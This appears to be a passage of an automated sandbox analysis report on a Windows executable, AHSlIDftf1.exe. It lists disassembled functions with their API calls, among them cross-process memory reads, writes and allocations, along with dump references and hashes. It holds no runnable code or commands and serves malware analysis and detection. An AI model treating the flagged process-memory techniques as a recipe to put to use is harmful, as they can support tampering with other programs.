                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DB114D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 842720411-0
                                                                                                            • Opcode ID: a3f2d5dc6934c6128ab8b4237295fb713df8b32b11b51198c9176e16e8a1adac
                                                                                                            • Instruction ID: 5f3fd633dec8bc08fcdcd90eac917bc5d1d2e12abc41da55aa59cb014ce28db8
                                                                                                            • Opcode Fuzzy Hash: a3f2d5dc6934c6128ab8b4237295fb713df8b32b11b51198c9176e16e8a1adac
                                                                                                            • Instruction Fuzzy Hash: AA016D79200305BFDB116F68DC89AAA3B6EEF863A0B140418FA45C7360DA31DC018A70
                                                                                                            Function 00DB0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00DB0FCA
                                                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00DB0FD6
                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00DB0FE5
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00DB0FEC
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00DB1002
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 44706859-0
                                                                                                            • Opcode ID: 8f48fa036f202d0cca0a636921480b5c0390d3fec0aafe34232fb3978fa5cad4
                                                                                                            • Instruction ID: 7050e4a4130a42a7cd232927cbf11a52fd1e4da362b79a30433cf77b67a5db98
                                                                                                            • Opcode Fuzzy Hash: 8f48fa036f202d0cca0a636921480b5c0390d3fec0aafe34232fb3978fa5cad4
                                                                                                            • Instruction Fuzzy Hash: FDF04F39210345EBD7216FA49C8DF963B6DEF8A761F544419FD46CA351CA70DC418A70
                                                                                                            Function 00DB1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00DB102A
                                                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00DB1036
                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DB1045
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00DB104C
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DB1062
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 44706859-0
                                                                                                            • Opcode ID: 14891a8e930f097bc05818a0e6e0bf5c3387c4429e1f3443991edfdd35f780c6
                                                                                                            • Instruction ID: 155908641950d4f238a14fa5b6ba57223cc686dc4f4c53061d3f47a8556511db
                                                                                                            • Opcode Fuzzy Hash: 14891a8e930f097bc05818a0e6e0bf5c3387c4429e1f3443991edfdd35f780c6
                                                                                                            • Instruction Fuzzy Hash: 87F06239210341EBD7216FA4EC9AF9A3B6DEF8A761F540414FD46CB350CA70D8418A70
                                                                                                            Function 00DC030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00DC017D,?,00DC32FC,?,00000001,00D92592,?), ref: 00DC0324
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00DC017D,?,00DC32FC,?,00000001,00D92592,?), ref: 00DC0331
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00DC017D,?,00DC32FC,?,00000001,00D92592,?), ref: 00DC033E
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00DC017D,?,00DC32FC,?,00000001,00D92592,?), ref: 00DC034B
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00DC017D,?,00DC32FC,?,00000001,00D92592,?), ref: 00DC0358
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00DC017D,?,00DC32FC,?,00000001,00D92592,?), ref: 00DC0365
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 09cec1c04694b3cf57430f7f208975bf2738aa2e8e5f97878fb1ae241ed99cef
                                                                                                            • Instruction ID: 2ba2cd87c86d15d9cd20019386dcefba8c0baad8c0c238fe6155bf604f7cc4e8
                                                                                                            • Opcode Fuzzy Hash: 09cec1c04694b3cf57430f7f208975bf2738aa2e8e5f97878fb1ae241ed99cef
                                                                                                            • Instruction Fuzzy Hash: F401A272800B56DFCB31AF66D880912FBF9BF503153198A3FD19652931C371A955CF90
                                                                                                            Function 00D8D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00D8D752
                                                                                                              • Part of subcall function 00D829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000), ref: 00D829DE
                                                                                                              • Part of subcall function 00D829C8: GetLastError.KERNEL32(00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000,00000000), ref: 00D829F0
                                                                                                            • _free.LIBCMT ref: 00D8D764
                                                                                                            • _free.LIBCMT ref: 00D8D776
                                                                                                            • _free.LIBCMT ref: 00D8D788
                                                                                                            • _free.LIBCMT ref: 00D8D79A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: e965c3235febddf77110bad050091ebb8fdae2ab6b5f5de75681e243e30665c7
                                                                                                            • Instruction ID: 8215f3b8ca538b7306dcbb3df07e233c1f8621a9da05061131f8a94457883ed6
                                                                                                            • Opcode Fuzzy Hash: e965c3235febddf77110bad050091ebb8fdae2ab6b5f5de75681e243e30665c7
                                                                                                            • Instruction Fuzzy Hash: 8FF0FF72584204AB8625FB69FDC5C6A77EEFB447107A94805F049E7581C734FC808B74
                                                                                                            Function 00DB5C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00DB5C58
                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00DB5C6F
                                                                                                            • MessageBeep.USER32(00000000), ref: 00DB5C87
                                                                                                            • KillTimer.USER32(?,0000040A), ref: 00DB5CA3
                                                                                                            • EndDialog.USER32(?,00000001), ref: 00DB5CBD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3741023627-0
                                                                                                            • Opcode ID: fcfd7bea396cb283976340e40efc48aa480f99d1a9b54e257c12e0fecf20e455
                                                                                                            • Instruction ID: ff1fc030d80256d833b6ef3357cf1833721668c4519435cbd323249c5feb68fd
                                                                                                            • Opcode Fuzzy Hash: fcfd7bea396cb283976340e40efc48aa480f99d1a9b54e257c12e0fecf20e455
                                                                                                            • Instruction Fuzzy Hash: A2018630510B44EBEB206B10ED8EFE67BB9BB00B05F04159DA583A51E5DBF0A9858AB0
                                                                                                            Function 00D822A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00D822BE
                                                                                                              • Part of subcall function 00D829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000), ref: 00D829DE
                                                                                                              • Part of subcall function 00D829C8: GetLastError.KERNEL32(00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000,00000000), ref: 00D829F0
                                                                                                            • _free.LIBCMT ref: 00D822D0
                                                                                                            • _free.LIBCMT ref: 00D822E3
                                                                                                            • _free.LIBCMT ref: 00D822F4
                                                                                                            • _free.LIBCMT ref: 00D82305
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 53664eb8cef8df4815413a6071fed77f6e5c18cb938217d2ef832ccdf27e8402
                                                                                                            • Instruction ID: 4235ff9d2ae3485031c19c36387b67f85d6d393b093fce9adebeb101751bd48a
                                                                                                            • Opcode Fuzzy Hash: 53664eb8cef8df4815413a6071fed77f6e5c18cb938217d2ef832ccdf27e8402
                                                                                                            • Instruction Fuzzy Hash: 6BF05E719C0120AF8632BF56BC418683B64F729760716054AF410F23B2C734195BAFF8
                                                                                                            Function 00D695C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • EndPath.GDI32(?), ref: 00D695D4
                                                                                                            • StrokeAndFillPath.GDI32(?,?,00DA71F7,00000000,?,?,?), ref: 00D695F0
                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00D69603
                                                                                                            • DeleteObject.GDI32 ref: 00D69616
                                                                                                            • StrokePath.GDI32(?), ref: 00D69631
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                            • String ID:
                                                                                                            • API String ID: 2625713937-0
                                                                                                            • Opcode ID: 47c7d47a9e2fa406a350faf53631827d980e5ea74dc94ca56529c7a6186ed4b8
                                                                                                            • Instruction ID: 555b3972824a5193c53498d5db8cd11a3f6d6d4c3b0178bf26455166ee07c230
                                                                                                            • Opcode Fuzzy Hash: 47c7d47a9e2fa406a350faf53631827d980e5ea74dc94ca56529c7a6186ed4b8
                                                                                                            • Instruction Fuzzy Hash: 4EF01930005388EFDB26AF66ED68B643B65AB91362F048254F465A91F0C7308A9BDF30
                                                                                                            Function 00D80F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __freea$_free
                                                                                                            • String ID: a/p$am/pm
                                                                                                            • API String ID: 3432400110-3206640213
                                                                                                            • Opcode ID: 98dfd22241e77bd8369b3e99c4f9451d3bea0f30efb43c7686b49921a1e8ce06
                                                                                                            • Instruction ID: 5f77c40d6364d37d01246038b00eab12a46620f00e84cc26b33a316e54c97965
                                                                                                            • Opcode Fuzzy Hash: 98dfd22241e77bd8369b3e99c4f9451d3bea0f30efb43c7686b49921a1e8ce06
                                                                                                            • Instruction Fuzzy Hash: F3D12779900206DACB24BF68C845BFEB7B8FF06700F2C4259E9459B650D3759D8ACBB1
                                                                                                            Function 00DD61D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D70242: EnterCriticalSection.KERNEL32(00E2070C,00E21884,?,?,00D6198B,00E22518,?,?,?,00D512F9,00000000), ref: 00D7024D
                                                                                                              • Part of subcall function 00D70242: LeaveCriticalSection.KERNEL32(00E2070C,?,00D6198B,00E22518,?,?,?,00D512F9,00000000), ref: 00D7028A
                                                                                                              • Part of subcall function 00D700A3: __onexit.LIBCMT ref: 00D700A9
                                                                                                            • __Init_thread_footer.LIBCMT ref: 00DD6238
                                                                                                              • Part of subcall function 00D701F8: EnterCriticalSection.KERNEL32(00E2070C,?,?,00D68747,00E22514), ref: 00D70202
                                                                                                              • Part of subcall function 00D701F8: LeaveCriticalSection.KERNEL32(00E2070C,?,00D68747,00E22514), ref: 00D70235
                                                                                                              • Part of subcall function 00DC359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00DC35E4
                                                                                                              • Part of subcall function 00DC359C: LoadStringW.USER32(00E22390,?,00000FFF,?), ref: 00DC360A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                                            • String ID: x#$x#$x#
                                                                                                            • API String ID: 1072379062-1894725482
                                                                                                            • Opcode ID: d72d0a492976e781c3691e38af845e124204035e47581319a7a465c95aa972b8
                                                                                                            • Instruction ID: 7cc762ee3c43aba81489b560e292567f05d35f1dcc894a2465332270c27e9085
                                                                                                            • Opcode Fuzzy Hash: d72d0a492976e781c3691e38af845e124204035e47581319a7a465c95aa972b8
                                                                                                            • Instruction Fuzzy Hash: 8DC13B71A00205AFDB14DF98D891EBEB7B9EF48310F14806AF955AB391DB70E945CBB0
                                                                                                            Function 00DD7B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D70242: EnterCriticalSection.KERNEL32(00E2070C,00E21884,?,?,00D6198B,00E22518,?,?,?,00D512F9,00000000), ref: 00D7024D
                                                                                                              • Part of subcall function 00D70242: LeaveCriticalSection.KERNEL32(00E2070C,?,00D6198B,00E22518,?,?,?,00D512F9,00000000), ref: 00D7028A
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                              • Part of subcall function 00D700A3: __onexit.LIBCMT ref: 00D700A9
                                                                                                            • __Init_thread_footer.LIBCMT ref: 00DD7BFB
                                                                                                              • Part of subcall function 00D701F8: EnterCriticalSection.KERNEL32(00E2070C,?,?,00D68747,00E22514), ref: 00D70202
                                                                                                              • Part of subcall function 00D701F8: LeaveCriticalSection.KERNEL32(00E2070C,?,00D68747,00E22514), ref: 00D70235
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                            • String ID: 5$G$Variable must be of type 'Object'.
                                                                                                            • API String ID: 535116098-3733170431
                                                                                                            • Opcode ID: af5ed00e62aa008777ab9bb4422891ede682184d2b9d7e1abd1b2348cd72f176
                                                                                                            • Instruction ID: d84a6ac7081d19501618c857c87b92a6438ae849d0b13721bcec6a96e2422fd4
                                                                                                            • Opcode Fuzzy Hash: af5ed00e62aa008777ab9bb4422891ede682184d2b9d7e1abd1b2348cd72f176
                                                                                                            • Instruction Fuzzy Hash: 8D914C74A04209EFCB14EF58D891DADB7B2EF45300F54809AF8466B392EB71AE45CB71
                                                                                                            Function 00DB2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DBB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DB21D0,?,?,00000034,00000800,?,00000034), ref: 00DBB42D
                                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00DB2760
                                                                                                              • Part of subcall function 00DBB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DB21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00DBB3F8
                                                                                                              • Part of subcall function 00DBB32A: GetWindowThreadProcessId.USER32(?,?), ref: 00DBB355
                                                                                                              • Part of subcall function 00DBB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00DB2194,00000034,?,?,00001004,00000000,00000000), ref: 00DBB365
                                                                                                              • Part of subcall function 00DBB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00DB2194,00000034,?,?,00001004,00000000,00000000), ref: 00DBB37B
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DB27CD
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DB281A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                            • String ID: @
                                                                                                            • API String ID: 4150878124-2766056989
                                                                                                            • Opcode ID: a250306e48f165d566b102f34dbf64a65b66ced52f299e127353207d7e63ca96
                                                                                                            • Instruction ID: 6777ecdeb9f7d47a41df66c33a5d98648e42874347834f1027a68a2bb705f1d5
                                                                                                            • Opcode Fuzzy Hash: a250306e48f165d566b102f34dbf64a65b66ced52f299e127353207d7e63ca96
                                                                                                            • Instruction Fuzzy Hash: D2413C76900218AFDB10DBA4CD85AEEBBB8EF09710F004059FA56B7291DB706E45CBB0
                                                                                                            Function 00D8172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\AHSlIDftf1.exe,00000104), ref: 00D81769
                                                                                                            • _free.LIBCMT ref: 00D81834
                                                                                                            • _free.LIBCMT ref: 00D8183E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$FileModuleName
                                                                                                            • String ID: C:\Users\user\Desktop\AHSlIDftf1.exe
                                                                                                            • API String ID: 2506810119-1322176223
                                                                                                            • Opcode ID: c7bac39378af856dcdee4621bc4e80d4fda51a48f8acd754d4fb8591968c07b7
                                                                                                            • Instruction ID: 8be9897268593eb0e2c417e668d5b0c0c6cd375cec023cc318e7feca514d3ffd
                                                                                                            • Opcode Fuzzy Hash: c7bac39378af856dcdee4621bc4e80d4fda51a48f8acd754d4fb8591968c07b7
                                                                                                            • Instruction Fuzzy Hash: 66318279A00258FFDB21EB999C81D9EBBFCEB95710B1441AAF404D7211D6708E4ACBB0
